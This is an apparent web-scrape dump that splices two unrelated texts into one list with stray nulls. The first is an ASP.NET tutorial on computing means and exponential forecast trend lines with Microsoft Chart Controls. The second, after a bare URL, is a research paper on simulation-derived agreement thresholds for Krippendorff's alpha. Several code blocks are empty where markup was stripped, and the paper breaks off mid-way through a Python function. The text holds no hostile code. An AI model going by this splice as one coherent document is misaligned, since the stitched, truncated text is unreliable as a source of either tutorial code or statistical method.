"",
null,
"Sections: Book Reviews •Sample Chapters JavaScript Tutorials MSDN Communities Hub Official Docs Security Stump the SQL Guru! Web Hosts XML Information: Advertise Feedback Author an Article",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"# Using Microsoft's Chart Controls In An ASP.NET Application: Adding Statistical Formulas\n\nBy Scott Mitchell\n\nA Multipart Series on Microsoft's Chart Controls\nA picture is worth a 1,000 words... This adage rings especially true when it comes to reporting. Charts summarize and illuminate patterns in data in a way that long tables of numbers simply cannot. The Microsoft Chart Controls are a free and encompassing set of charts for WinForms and ASP.NET applications. This article series explores how to use these Chart Controls in an ASP.NET application.\n\n• Getting Started - walks through getting started using the Chart Controls, from version requirements to downloading and installing the Chart Controls, to displaying a simple chart in an ASP.NET page.\n• Plotting Chart Data - examines the multitude of ways by which data can be plotted on a chart, from databinding to manually adding the points one at a time.\n• Rendering the Chart - the Chart Controls offer a variety of ways to render the chart data into an image. This article explores these options.\n• Sorting and Filtering Chart Data - this article shows how to programmatically sort and filter the chart's data prior to display.\n• Programmatically Generating Chart Images - learn how to programmatically create and alter the chart image file.\n• Creating Drill Down Reports - see how to build drill down reports using the Chart control.\n• Adding Statistical Formulas - learn how to add statistical formulas, such as mean, median, variance, and forecasts, to your charts.\n• Enhancing Charts With Ajax - improve the user experience for dynamic and interactive charts using Ajax.\n• Serializing Chart Data - see how to persist a chart's data and appearance to a persistent store.\n• Using the Chart Controls with ASP.NET MVC - learn how to display charts in an ASP.NET MVC application.\n• Exporting Charts - allow visitors to export charts as images and PDF files.\n• ## Introduction\n\nThe Microsoft Chart controls make it easy to take data from a database or some other data store and present it as a chart. As discussed in Plotting Chart Data, the Chart controls offer a myriad of ways to get data into a chart. You can add the data programmatically, point-by-point, or you can bind an ADO.NET `DataTable` directly to the Chart. You can even use declarative data source controls, like the SqlDataSource or ObjectDataSource controls.\n\nIn addition to converting your specified data points into a chart image, the Chart controls also include a wealth of statistical formulae that you can use to analyze the plotted data. For example, with a single line of code you determine the mean (average) value for data in a particular series. Likewise, with one line of code you can get the median, variance, or standard deviation. These values can be displayed as text on the page or as a stripe line on the chart itself. What's more, the Chart controls include functions to forecast future values, to compute moving averages, to identify trends, and to determine rates of change, among others.\n\nThis article looks at how to use two statistical formulae. Specifically, we'll look at how to compute and display the mean of a series, as well as how to display an exponential trend line on the chart to forecast future values. Read on to learn more!\n\n- continued -\n\n## Computing the Mean Value of a Series of Data Points\n\nGiven a list of numbers, the arithmetic mean is the sum of those numbers divided by the total quantity of numbers in the list. 
The mean is more colloquially referred to as the \"average,\" and is a common metric used to analyze data.\n\nA chart consists of one or more series, which are lists of data points. Typically, each data point is a pair of numbers that provide both the X value and Y value to be plotted. For some charts it may be helpful to know the average value of the data points plotted in a series. Consider a chart that shows gross sales by month for a particular product. In this case the X axis would list off the months (January, February, ...) while the Y axis would show the gross sales per month. In such a chart it might be helpful to know the mean (average) gross sales per month.\n\nYou could certainly compute the mean gross sales per month with a few lines of code that loop through the data points, sum up the values, and then divide by the count of data points. There's no need to write that code, however, because the Microsoft Chart controls provide a built-in function for computing the mean of a series:\n\n ``` 'Determine the mean of the series SalesByMonth Dim mean As Double = ChartID.DataManipulator.Statistics.Mean(\"SalesByMonth\")```\n\nSimilarly, you can compute the median or the variance using the `Median` or the `Variance` functions in much the same way.\n\nThe demo available for download at the end of this article includes a page named `MeanSales.aspx`, which displays a line chart showing monthly sales for the products in a specific category for a specific year along with the mean monthly sales. The mean monthly sales are displayed in two ways: as text and as a stripe line on the chart itself. The screen shot below shows the monthly sales for those products in the Produce category for 1997. Note that the average sales per month - \\$4,809.88 - is shown both as text on the page and as an orange line on the chart.",
null,
"To create this chart I started by adding two DropDownList controls to the page named `ddlCategory` and `ddlForYear`. The `ddlCategory` DropDownList is bound to a SqlDataSource control that populates it with the categories in the `Categories` database table. The `ddlForYear` contains three `ListItem`s - 1996, 1997, and 1998 - one for each year for which sales data exist. I also added a Label control (`lblAverageSales`) to display the mean sales per month as text.\n\nNext, I added the Chart control to the page named `chtCategorySales` and bound it to a SqlDataSource control named `dsCategorySales`. The SqlDataSource control executes the following query, which returns each month with sales for products in a particular category for a particular year.\n\n ``` SELECT MONTH(o.OrderDate) AS Month, SUM(od.UnitPrice * od.Quantity) AS Total FROM Orders AS o INNER JOIN [Order Details] AS od ON o.OrderID = od.OrderID INNER JOIN Products AS p ON p.ProductID = od.ProductID WHERE (p.CategoryID = @CategoryID) AND (YEAR(o.OrderDate) = @ForYear) GROUP BY MONTH(o.OrderDate) ORDER BY Month```\n\nThe Chart control contains a single line chart series named `SalesByMonth`, which has its `XValueMember` and `YValueMembers` properties set to the names of the columns returned from the database query (`Month` and `Total`, respectively). The Chart control's declarative markup also defines a chart area (`MainChartArea`) with some Y axis settings. Namely, I configured the Y axis to format its labels as currency values (with no decimal places) and to add an orange stripe line. A stripe line is a line (or band) that can be added to the X or Y axis and used to show a particular value or range of values. In this case, I use the stripe line to show the average sales per month. The position of the stripe line is based on its `IntervalOffset` property, which is programmatically set to the mean value (we'll explore this code momentarily).\n\n ``` ```\n\nThe SqlDataSource plus the Chart's declarative markup is sufficient to display a chart of the gross sales per month for the selected category and year. In order to show the mean sales per month we need to write a few lines of code. Keep in mind that we cannot calculate the mean until the series is populated with data. When using a Chart that is bound to a data source control you know that the data has been plotted once the `DataBound` event is raised. Therefore, I've created an event handler for this event and placed the code to compute and display the mean there. (If you are adding the points programmatically rather than from a declarative data source control then you would add this code immediately after the code that plots your data. The forecasting demo we'll look at shortly provides such an example.)\n\n ``` Protected Sub chtCategorySales_DataBound(ByVal sender As Object, ByVal e As System.EventArgs) Handles chtCategorySales.DataBound 'Determine the mean Dim mean As Double = chtCategorySales.DataManipulator.Statistics.Mean(\"SalesByMonth\") 'Display mean as text lblAverageSales.Text = mean.ToString(\"C\") 'Display stripe line chtCategorySales.ChartAreas(\"MainChartArea\").AxisY.StripLines(0).IntervalOffset = mean End Sub```\n\nHere we calculate the mean, display it in the `lblAverageSales` Label control, and assign it to the stripe line's `IntervalOffset` property. 
The net effect is that when the chart is plotted the mean sales per month is calculated and displayed both as text on the page and as a stripe line on the chart.

## Using Forecasting Statistical Formulae

There are a variety of statistical formulae that can be used for forecasting. In brief, these formulae typically work by arriving at an equation whose line closely models the existing, known data points. This equation can then be extended to forecast future values. To apply a forecasting formula you must supply the following inputs:

- The forecasting parameters, which must be formatted into a comma-delimited string. There are four optional parameters:
  - Regression Type - determines the type of equation to fit against the known points. You can specify a numeric value to indicate the degree of a polynomial regression, or you may use one of the following regression types: `Linear`, `Exponential`, `Logarithmic`, or `Power`.
  - Period - the number of time units in the future to forecast. For example, to forecast three months into the future for monthly sales you would use a value of 3 here.
  - Approximate Error - a Boolean value that indicates whether to output the approximation error.
  - Forecast Error - a Boolean value that indicates whether to output the forecasting error.
- The input series, namely the data for which the forecasts are being made.
- The output series. If you are outputting the approximate or forecasting errors then you will need to have a series for both the forecast and the errors.

To apply a forecasting formula, use code like the following:

```
ChartID.DataManipulator.FinancialFormula(FinancialFormula.Forecasting, parameters, inputSeries, outputSeries)
```

The demo available for download at the end of this article includes a page named `Trendline.aspx`, which uses an exponential regression to predict sales figures three months into the future. The following screen shot shows the sales figures for Dairy Products in 1997 and the forecast for the first quarter of 1998. Things are looking up!

![Dairy Products sales in 1997 along with a forecast for the first quarter of 1998](https://www.4guysfromrolla.com/images/mschart21.png)
"Like the mean sales demo, to create the `Trendline.aspx` I started by adding and configuring two DropDownList controls to the page to capture the category and year used to power the report. I then added the Chart control to the page. Rather than use a SqlDataSource control to declaratively bind the data to the chart, I instead decided to bind the data to the chart programmatically. (Using a SqlDataSource here certainly would have worked just fine.) Before we look at the code, let's take a peak at the Chart control's declarative markup. Recall that in the previous example we added a stripe line to the Y axis to show the mean sales per month. We don't need a stripe line for this chart, but we do need to define two series - one for the sales per month (`SalesByMonth`) and another for the forecasting trend line (`TrendLine`).\n\n ``` ... ```\n\nIf you want to include the approximate error or forecasting error you'd need to include series for these (most likely Range series).\n\nThe sales per month data is actually added to the chart from code in the `Page_Load` event handler. Specifically, a connection is made to the database, an ad-hoc query is executed that gets the sales data, and the results are enumerated, with each record returned from the database added to the `SalesByMonth` series. After the data has been plotted, an Exponential regression is used to add the forecast data to the `TrendLine` series. An abbreviated version of the `Page_Load` event handler code follows:\n\n ``` Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load Using myConnection As New SqlConnection ... Get sales per month data from database for selected category / year and add it to the chart point-by-point ... End Using 'Add a trend line using an exponential regression chtCategorySales.DataManipulator.FinancialFormula(FinancialFormula.Forecasting, _ \"Exponential,3,false,false\", _ chtCategorySales.Series(\"SalesByMonth\"), _ chtCategorySales.Series(\"TrendLine\")) End Sub```\n\nThe code that actually queries the database and plots the points one at a time has been removed for brevity. Download the demo to see the full code; refer to Plotting Chart Data for detailed examples on adding chart data point-by-point.\n\nThe red code in the snippet above adds the forecasting trend line to the chart's `TrendLine` series, forecasting sales per month three months into the future.\n\n## Conclusion\n\nIn addition to merely displaying plotted data, the Microsoft Chart controls include functionality for analyzing that data using a variety of statistical formulae. This article explored how to use this functionality to compute the mean (average) value in a series and how to add a trend line to forecast future results. These two examples just scratch the surface of the statistical capabilities of the Chart control - there are many more formulae available, including functions to compute moving and weighted moving averages, ranges, statistical distributions, and more.\n\nHappy Programming!\n\n• By Scott Mitchell\n\nAttachments:",
https://bmcmedresmethodol.biomedcentral.com/articles/10.1186/s12874-018-0606-7
"# Reliability in evaluator-based tests: using simulation-constructed models to determine contextually relevant agreement thresholds\n\n## Abstract\n\n### Background\n\nIndices of inter-evaluator reliability are used in many fields such as computational linguistics, psychology, and medical science; however, the interpretation of resulting values and determination of appropriate thresholds lack context and are often guided only by arbitrary “rules of thumb” or simply not addressed at all. Our goal for this work was to develop a method for determining the relationship between inter-evaluator agreement and error to facilitate meaningful interpretation of values, thresholds, and reliability.\n\n### Methods\n\nThree expert human evaluators completed a video analysis task, and averaged their results together to create a reference dataset of 300 time measurements. We simulated unique combinations of systematic error and random error onto the reference dataset to generate 4900 new hypothetical evaluators (each with 300 time measurements). The systematic errors and random errors made by the hypothetical evaluator population were approximated as the mean and variance of a normally-distributed error signal. Calculating the error (using percent error) and inter-evaluator agreement (using Krippendorff’s alpha) between each hypothetical evaluator and the reference dataset allowed us to establish a mathematical model and value envelope of the worst possible percent error for any given amount of agreement.\n\n### Results\n\nWe used the relationship between inter-evaluator agreement and error to make an informed judgment of an acceptable threshold for Krippendorff’s alpha within the context of our specific test. To demonstrate the utility of our modeling approach, we calculated the percent error and Krippendorff’s alpha between the reference dataset and a new cohort of trained human evaluators and used our contextually-derived Krippendorff’s alpha threshold as a gauge of evaluator quality. Although all evaluators had relatively high agreement (> 0.9) compared to the rule of thumb (0.8), our agreement threshold permitted evaluators with low error, while rejecting one evaluator with relatively high error.\n\n### Conclusions\n\nWe found that our approach established threshold values of reliability, within the context of our evaluation criteria, that were far less permissive than the typically accepted “rule of thumb” cutoff for Krippendorff’s alpha. This procedure provides a less arbitrary method for determining a reliability threshold and can be tailored to work within the context of any reliability index.\n\n## Background\n\nInter-evaluator reliability is a widely-debated topic relevant to a variety of fields such as communication, computational linguistics, psychology, sociology, education, and medical science, among others [1, 2]. Although the consequences of evaluator-based tests vary, some evaluator-based tests, such as those used in medicine, may strongly influence the diagnosis and treatment of patients.\n\nEvaluators are typically employed when a desired functional or clinically-relevant value is otherwise unmeasurable. In some of these cases, there may indeed be an objective or ideal “correct” answer, but because the variable is, in principle, unmeasurable, it is impossible to know how accurate the evaluator is in arriving at this ideal answer. 
By generating data using multiple evaluators and comparing responses, we can begin to gauge the quality of the evaluators, the measurement process, the generated data, and the resulting conclusions [3,4,5,6].

Inter-evaluator reliability is discussed using different terminologies across disciplines, with concepts such as evaluator "agreement" and "reliability" used to varying degrees of consistency. Regardless of the terminology, inter-evaluator reliability can be described as the likelihood that different influences, such as evaluators, methods, and approaches, will produce the same results or interpretations [2, 7]. More formally, the key term "reliability" is defined as the ratio of the variability of what is being measured to the variability of the measurement process. Therefore, high reliability indicates that measurement error is small, while low reliability suggests high variability and measurement error. For evaluator-based tests, inter-evaluator reliability cannot be measured directly. As the variable of interest is not precisely known, comparisons between its true variability and the variability of the measurements cannot be made. Instead, agreement between evaluators is measured and used as a proxy to qualitatively infer inter-evaluator reliability [9,10,11].

The effective usage of inter-evaluator agreement measures is limited by a lack of standardization in application and interpretation. For example, many statistics to measure inter-evaluator agreement (commonly referred to as "inter-evaluator reliability indices") have been proposed; however, because of the specificity required by actual implementation, most are considered unsuitable for general use [5, 7, 9, 12, 13]. This means that different studies may often use different reliability indices, which may make comparisons of their results problematic. Perhaps the greater limitation with inter-evaluator reliability indices is the general difficulty in interpreting their numerical outcomes; understanding these numerical outcomes is critical to appropriately assessing the trustworthiness of the reliability data. Typically, the possible values for a reliability index range from 0 to 1, where 0 suggests the absence of reliability and 1 suggests perfect reliability. Devising a universal threshold of "acceptability" between 0 and 1 that works for any dataset, independent of context, is not likely possible. For most indices (e.g., Bennett et al.'s S, Cohen's κ, Scott's π, Krippendorff's α) it is commonly suggested that a cutoff threshold value of 0.8 is a marker of good reliability, with a range of 0.667 to 0.8 allowing for tentative conclusions [4, 9, 11, 13, 14, 15, 16]. Interestingly, these threshold values are often employed with the knowledge of their largely arbitrary determination, and used in spite of suggestions that they are likely unsuitable for generalization [4, 10, 11, 15, 16]. This poses the problem of incorrect interpretation of results, as using an unacceptably low agreement threshold can result in unreliable data being trusted, increasing the likelihood of drawing invalid conclusions. Conversely, an overly strict agreement threshold may lead to discarding valid findings. An inappropriate agreement threshold could also preclude opportunities for exploring and correcting sources of unreliability in evaluators and/or evaluation methods.
An ideal threshold value would be derived through analytical methods that provide a meaningful number in the specific context of its application and use.

An examination of the literature suggests that the issue of determining an appropriate reliability threshold is still an open problem, as few-to-no methodologies have been adopted for the determination of contextually-relevant threshold values to facilitate drawing conclusions from inter-evaluator data [2, 13]. Indeed, other investigators are still working to tackle this issue. Wilhelm et al. conducted a simulation study, with themes similar to those described in this paper, to determine how agreement thresholds impact the results of reliability studies [17]. The necessity for a solution to this problem is clearly evidenced by a severe lack of consistency and systematicity in how inter-evaluator reliability measures are interpreted. In fact, we examined seven clinically-relevant inter-evaluator reliability studies that have been published since 2015 and found that for 4 of the 7 studies, it was unclear how benchmarks of reliability were determined (i.e., what constituted a good versus bad score) [18,19,20,21]. The three remaining studies each used a different source for inter-evaluator reliability interpretation guidelines, and thus used slightly different grading scales [22,23,24]. Additionally, reliability indices alone cannot tell us the error inherent to a group of evaluators attempting to measure a variable of interest. For example, Wilhelm et al. reviewed articles in two major journals and found that researchers tended to report inter-rater agreement above 0.80 without addressing the magnitude of score differences between raters [17], which is a central theme of our paper.

In addressing these fundamental gaps, this work develops a methodological framework to bridge the concepts of inter-evaluator reliability (reliability indices) and the potential measurement error in a functional or clinically-relevant value. We illustrate and evaluate the application of this framework using a quantitative example, where evaluators extracted time intervals from specific cues in video footage. We suggest that using this methodology, application-specific reliability thresholds can be determined for most any given task or reliability index. The development of such a technique may help unlock acceptable reliability index thresholds, establish performance benchmarks for evaluator training programs, and provide context directly to applications of reliability indices.

## Methods

The methods are presented as a general methods section and a quantitative example. The quantitative example illustrates the application of the general methodology, and evaluates the performance of the techniques presented. It is important to note that the specific measures used in the quantitative example (i.e., Krippendorff's alpha and percent error) were chosen for our specific application, and the general methods described in this paper are not limited to these reliability and error measures.

### General methods

The goal of this work is to develop a methodology to establish a relationship between a chosen reliability index and the measurement error of a functional or clinically-relevant value. Our approach involves generating a large population of simulated evaluator data, and then calculating the error and agreement of each against a reference dataset.
This creates a model between evaluator agreement and error that describes how much error could be expected for any given level of agreement (Fig. 1). The step-by-step approach below describes how this method is generally applied. The instructions are intended for investigators with a modest background in mathematics, statistics, and basic programming (such as MATLAB). The simulation time will vary based on several factors (calculation optimization, dataset size, simulation iterations, etc.). For our quantitative example, the simulation and calculations took approximately 1 to 2 h to run on a standard office desktop computer.

#### Establish a reference dataset

A reference dataset must be established for the evaluator test that is being modelled. The only requirement for the reference dataset is that it is representative of a typical dataset from that test. The reference dataset is not required to be empirical data; rather, the reference dataset could be generated from a distribution of, or a distribution parameterized to resemble, a population of test scores. This reference dataset will be used as a basis for generating and comparing the simulated evaluator population. There are no specific requirements for the length of the reference dataset. The authors do not wish to conjecture on the appropriate amount of data to be used when working with reliability indices, as the answer is likely context-sensitive, and has been investigated by others [25, 26]. At a minimum, it would seem necessary to include at least the same amount of data that would be used in a practical application or research study using that reliability index. For example, if one were generating a model to provide context to field applications of inter-evaluator reliability measures, then using a reference dataset of the same size that has been determined appropriate for those field applications would likely provide the most relevant model. It should be noted that the reference dataset is not required to be a single instance of an evaluator test, but instead could be a concatenation of results from multiple independent instances of that test. Mathematically, we will refer to the reference dataset as $$I_m$$, where m is the number of measurements in the dataset.

#### Simulate a population of evaluators

For purposes of simplification, the reference dataset can now be thought of as a "perfect evaluator." That is, the reference dataset is considered to be the result of an evaluator who is perfectly reliable, and has obtained the "correct" answer from evaluating the test. As stated above, the reference data do not need to be correct (or even empirical data); they are only referred to as correct for purposes of generating the model because they are used as a basis of comparison. Their actual correctness has no bearing on the model's accuracy or validity. Each new evaluator is simulated by taking the reference dataset and introducing Gaussian noise into it. Taylor has shown that a Gaussian distribution is a valid first-order approximation of the two observational errors that are inherent to any system of measurement: systematic errors and random errors [27]. These errors can be modelled by modifying the first (mean) and second (standard deviation) moments of the Gaussian distribution, respectively [27]. In essence, the Gaussian distribution can be thought of as an evaluator whose likelihood of making a systematic error or random error is described by the mean and standard deviation of the Gaussian distribution.
For example, an evaluator who makes systematic errors is described by a Gaussian distribution with a shifted mean (errors are systematically in the same direction), whereas an evaluator who makes random errors is described by a Gaussian distribution with a large standard deviation (errors randomly fall on either side of the average measurement). In practice, evaluator mistakes may not be perfectly Gaussian, but over many simulated trials, all evaluator errors would tend to a Gaussian distribution due to the central limit theorem.

A set of random variables from Gaussian distributions (we will call this set "$$\mathcal{X}$$") must be generated to capture at least the range of evaluator behavior that may be practically expected; additional distributions may be generated to capture more erroneous behavior, but this may incur additional computation time. The total number of random Gaussian variables (the size of set $$\mathcal{X}$$) generated will depend on the chosen step-size and range of systematic error and random error to be investigated, and this is heavily dependent on the specific task. In many cases, it may be appropriate to increment systematic error and random error by the resolution of rating units used in the test (i.e., the smallest change in measurement an evaluator can make). If a continuous scale is being used, an appropriate error step-size will have to be determined; there is no set procedure for determining the error step-size, and this will have to be done at the discretion of the investigator. A general rule might be to use the smallest step-size that is still detectable or has meaningful relevance to the test (e.g., a step-size of one nanosecond would be too fine a resolution for a human reaction time task, whereas a step-size of a second would be too coarse). In the case of nominal data, where only two rating units are available, the error step-size may be thought of as a probability step-size. It should be noted that this method allows the step-size and range of systematic error and random error to be chosen independently.

The chosen values of systematic error to investigate will be represented by the array μ, and the length of that array (the chosen range of error divided by the chosen resolution) will be referred to as, and indexed by, i. Similarly, the values of random error will be represented by the array σ, and the length of that array will be referred to as, and indexed by, j. Additionally, the μ and σ arrays should each contain the value "0," representing an evaluator who does not make that type of measurement error. Therefore, the equation

$$\mathcal{X}_{ij} \sim \mathcal{N}\left(\mu_i, \sigma_j\right)$$

(1)

describes an i by j matrix of Gaussian random variables, where i and j index the mean (μ) and standard deviation (σ) of the $$\mathcal{X}_{ij}$$ Gaussian distributions from which the random variables were generated, respectively. New i * j Gaussian random variables are generated along the m dimension, so that there are i by j random variables for each of the m measurements in the reference dataset. Next, the reference dataset, $$I_m$$, must be replicated along the i and j dimensions. Thus, $$I_{ijm}$$ is a matrix of the reference data containing i * j copies of each of the m measurements, so that each measurement can be modified by each ij Gaussian random variable.
The final step is to generate the simulated evaluator population, $$I'$$, calculated as

$$I'_{ijm} = I_{ijm} + \mathcal{X}_{ijm}.$$

(2)

Each element of $$I_{ijm}$$ is modified by a random value generated from one of the Gaussian distributions, whose parameters are described by i and j. The result is a population of simulated evaluators, the matrix $$I'_{ijm}$$. Each ij evaluator, whose measurement errors are described by $$\mathcal{X}_{ij}$$, has made m measurements. As previously stated, the evaluator whose μ = 0 and σ = 0 is the perfect evaluator (the initial reference dataset) who will be the basis of comparison for all other simulated evaluators.

This process relies on the sampling of random variables ($$\mathcal{X}_{ijm}$$), and therefore the simulation should be repeated N times. This smooths the randomness of the data and allows for a more robust model. Our methodology has no inherent requirements about the number of times the simulation should be repeated. Many others have investigated optimal sample sizes for simulation studies [28, 29], and their work may be considered when choosing the number of iterations for this simulation method. In general, increasing the number of simulations improves the final result but increases computation time. Thus, the result of the simulation should be i * j evaluator datasets of length m, where each ijm combination has been simulated N times (with each simulation sampling ijm new random variables from the ij Gaussian distributions).
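To make this simulation step concrete, the following is a minimal Python/NumPy sketch of Eqs. (1) and (2); our own implementation was written in MATLAB, so this is an illustrative re-expression rather than the original code. The reference dataset `I` is a placeholder array, and the error grid and flooring rule are borrowed from the quantitative example described below.

```
import numpy as np

rng = np.random.default_rng(seed=1)

# Placeholder reference dataset I_m: m = 300 timing measurements in seconds.
# In practice this would be the averaged expert-evaluator data.
I = rng.uniform(0.5, 5.0, size=300)

frame = 1.0 / 30.0              # one video frame = 0.033 s
mu = np.arange(7) * frame       # systematic errors, 0 to 6 frames
sigma = np.arange(7) * frame    # random errors, 0 to 6 frames
N = 100                         # simulation repetitions

# Eqs. (1)-(2): I'_ijm = I_m + X_ijm, with X_ijm ~ N(mu_i, sigma_j), drawn
# independently for each repetition. Result shape: (N, len(mu), len(sigma), m).
noise = (mu[None, :, None, None]
         + sigma[None, None, :, None]
         * rng.standard_normal((N, mu.size, sigma.size, I.size)))
I_sim = I[None, None, None, :] + noise

# Floor non-positive durations to one frame, as in the quantitative example.
I_sim = np.maximum(I_sim, frame)
```

Each slice `I_sim[:, i, j, :]` then holds the N repeated datasets for the simulated evaluator whose systematic and random errors are described by $$\mu_i$$ and $$\sigma_j$$.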
#### Create the model

Once the evaluator population has been simulated, agreement and error must be calculated for each of the N * i * j evaluators. In other words, each combination of i and j must be compared to the μ = 0, σ = 0 perfect evaluator (the reference dataset). Our method is not limited to any particular agreement or error calculation, so this step is dependent on the reliability index and error calculation that are most appropriate to the evaluator task. However, the manner in which agreement and error measures are calculated should be reflective of how they would be applied in practice. For example, if the result of an evaluator test is interpreted by adding all of the evaluator's individual scores together, then error should be calculated on this sum. Alternatively, if an evaluator's results are interpreted by averaging all of their individual scores together, then error should be calculated on this averaged score. Generally, it is likely that the best method for calculating agreement is to compare each individual score between the evaluators. However, it is most important that agreement is calculated in the way that has been deemed most appropriate for the practical application or research study, as this will provide the most relevant model between agreement and error.

Once agreement and error have been calculated for each evaluator relative to the reference dataset, agreement and error should be averaged by observational error parameters across all N simulations. That is, every evaluator who had both the same μ and σ could be considered to have been the same evaluator (as they were exactly as probable to make the same mistakes), and therefore their agreement and error from all N simulations should be averaged together to quantify their average performance, thus smoothing the simulated data. This should result in i * j four-dimensional data points, each containing an agreement, error, $$\mu_i$$, and $$\sigma_j$$ value: one for each of the i * j evaluators.

The agreement and error of all evaluators can now be plotted against each other to model how much error can be expected from an evaluator based on their level of agreement. Optionally, systematic error ($$\mu_i$$) and random error ($$\sigma_j$$) can be plotted for each evaluator (e.g., by the color or size of markers; see below for an example) to further understand how observational errors affect agreement and error. It would generally be expected that an envelope will form; essentially, this is a boundary that emerges which describes the maximum error (worst-case error) an evaluator could be expected to have, based on their calculated agreement. We demonstrate this below in our quantitative example. A function may be fit to this envelope, which allows a mathematical description relating agreement and worst-case error.

### Quantitative example

This quantitative example is provided to illustrate how the method is applied, and because it was a practical challenge that we encountered in our research; the solution to that challenge was the basis of this general method. Again, it is important to clarify that the specifics of how the method is applied to this evaluator task (agreement measure, error measure, etc.) are not due to inherent limitations of the method; rather, our selected reliability index, error measure, error step-size, etc., were chosen as the most appropriate for our particular evaluator task.

#### Establish a reference dataset

Three research professionals analyzed video footage, with the goal of improving internal processes. They judged and recorded the times of two distinct reoccurring events. The video was obtained under a Defense Advanced Research Projects Agency (DARPA) research study and contained footage of an anonymous consented participant transferring rubber blocks between two compartments of a wooden box. Evaluators worked in isolation using media player software which allowed forward and backward frame-by-frame scrubbing. They scanned through the video and determined the times at which the participant grasped blocks in one compartment and the times at which they released them into the other compartment. They recorded these video timing events into a spreadsheet, producing a total of 300 timing measurements for each evaluator. Each individual timing event was averaged across the three expert evaluators to produce a single representative 300-point reference dataset.

#### Simulate a population of evaluators

We wrote a custom MATLAB (MathWorks, Natick, MA) script to create 49 unique simulated evaluators by injecting error into the reference dataset. To do this, the script generated 49 Gaussian distributions, each with a different combination of mean and standard deviation parameters, which represented systematic error (μ) and random error (σ), respectively. In other words, each of the 49 combinations of μ and σ generated a distinct Gaussian distribution, where each Gaussian distribution represented the observational errors made by a different simulated evaluator. The analyzed video footage was recorded at 30 frames per second, so the step-size for μ and σ of the Gaussian distributions was chosen to be 0.033 s (one video frame), the smallest possible error. The values of μ and σ ranged from 0 to 0.198 s (0 to 6 video frames), for a total of 49 combinations. In cases where μ was low and σ was high, some simulated evaluators occasionally selected negative values (about 0.3% of measurements).
While our chosen range of random error resulted in this unrealistic circumstance, we wanted to ensure that we captured a sufficient range of evaluator error to build our model. In our application, negative and zero-duration timing events were not possible, so these values were defaulted to 0.033 s (the minimum resolvable time for an event, one video frame). This introduced a small amount of bias to cases with high random error relative to systematic error, which can be seen in the results; we discuss this in more detail below.

Three hundred random numbers were then chosen from each of the 49 Gaussian distributions and added to the reference dataset to create 49 new unique hypothetical datasets, each containing 300 modified timing values, as described above in Eqs. (1) and (2). In other words, each simulated evaluator made 300 different "mistakes," one for each of the 300 measurements, with each error drawn from the evaluator's own Gaussian distribution. Each of the 49 modified datasets represented a set of 300 imperfect scores generated by a simulated evaluator. It should be noted that our choice of using 300 measurements reflects how we would use inter-evaluator agreement in a practical application. That is, a complete execution of the test produces 300 measurements, and we would ideally measure inter-evaluator agreement on a full test dataset; thus, we chose to generate our model using a full 300-measurement dataset.

To smooth the randomness of the data, we repeated this process 100 times for each of the 49 Gaussian distributions. We stopped the simulation after 100 iterations, as this produced a smooth monotonic relationship between increasing random error and decreasing inter-evaluator agreement, which we deemed appropriate for our specific application. This resulted in 4900 unique hypothetical datasets. These new hypothetical datasets were then used as the "results" obtained from 49 simulated evaluators, each completing the video analysis task 100 times.

#### Create the model

The Krippendorff's alpha and percent error were then calculated for each of the 4900 datasets, pairwise with the reference dataset, to explore relationships between Krippendorff's alpha, percent error, systematic error, and random error. We specifically chose Krippendorff's alpha as it was appropriate for our data, which were time measurements (ratio data type). Krippendorff explains in detail how Krippendorff's alpha is calculated in his 2011 manuscript [30]. Here, we briefly summarize the calculation. We wrote a custom LabVIEW (National Instruments, Austin, TX) program which used the coincidence matrix calculation method (Eq. 3),

$$\alpha = 1 - \left(n-1\right)\frac{\sum_c \sum_k o_{ck} \cdot {}_{metric}\delta_{ck}^2}{\sum_c \sum_k n_c \, n_k \cdot {}_{metric}\delta_{ck}^2},$$

(3)

and verified the accuracy of our program with ReCal OIR [30, 31]. Equation (3) was used for all Krippendorff's alpha calculations, where n is the total number of measurements collected, and c and k are each a separate index into the same set of unique values, incrementing independently to generate every allowable pairwise combination. The allowable pairwise combinations are $$x_c$$ and $$x_k$$ (the reliability data; see Eq. 4) for all possible values of c and k, whereas $$n_c$$ and $$n_k$$ are the total numbers of times that $$x_c$$ and $$x_k$$ are used. The number of occurrences of $$x_c$$ and $$x_k$$ value pairings within the reliability data is represented by $$o_{ck}$$.
The type of reliability data being used dictates which "difference function" to use, defined as $${}_{metric}\delta_{ck}^2$$, where metric is the data type. The difference function for ratio data is shown in Eq. (4):

$${}_{ratio}\delta_{ck}^2 = \left(\frac{x_c - x_k}{x_c + x_k}\right)^2.$$

(4)

We used the coincidence matrix to calculate Krippendorff's alpha because it is the most computationally efficient method (Fig. 2). For our percent error calculations (Eq. 5, where Theoretical is the reference measurement and Experimental is the simulated measurement),

$$Percent\ error = \frac{\left|Theoretical - Experimental\right|}{Theoretical} \times 100,$$

(5)

we decided what part of the task provided the highest level of error. In our video rating task, the "speed" phase (50 timing events out of the 300), where the participant rapidly moved the blocks from one side of the box to the other, was the most sensitive to timing errors because the events were so short. A small error in measurement produced a relatively large percent error. In our task, the individual errors were not important. We were interested in the total error of the 50 timing events from the speed phase, so we quantified the percent error of the total time of those events. Using the error measurements of this subset provided the worst-case baseline to sufficiently capture the percent error for the most difficult aspects of the task. Also, we were not concerned with the direction of the error (i.e., whether it was negative or positive relative to the reference value), only the magnitude of the error, so the absolute value of percent error was used. It is important to understand that this described procedure for calculating error is not inherent to the methodology; it is an idiosyncrasy of the task that we are using to demonstrate the methodology. For another task, it may be more appropriate to use total error, root mean squared error, or some other calculation to quantify the error of an evaluator. We constructed the model for this task using the Krippendorff's alpha and percent error calculations.
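As a worked illustration of Eqs. (3) through (5), the sketch below computes Krippendorff's alpha for ratio data and percent error in Python; our actual implementation was written in LabVIEW, so this is an assumed re-expression rather than the original code. It assumes exactly two complete sets of ratings per comparison (the reference dataset and one simulated evaluator) with no missing data, which is the situation in our pairwise comparisons.

```
import numpy as np

def ratio_delta_sq(a, b):
    # Ratio-data difference function of Eq. (4).
    return ((a - b) / (a + b)) ** 2

def krippendorff_alpha_ratio(ref, sim):
    # Krippendorff's alpha (Eq. 3) for two complete sets of ratio ratings.
    # With two raters and no missing data, each unit contributes one value
    # per rater, so there are n = 2 * m pooled values in total.
    ref, sim = np.asarray(ref, float), np.asarray(sim, float)
    n = ref.size + sim.size

    # Numerator: observed coincidences. Each unit contributes the ordered
    # pairs (ref_u, sim_u) and (sim_u, ref_u), each weighted by
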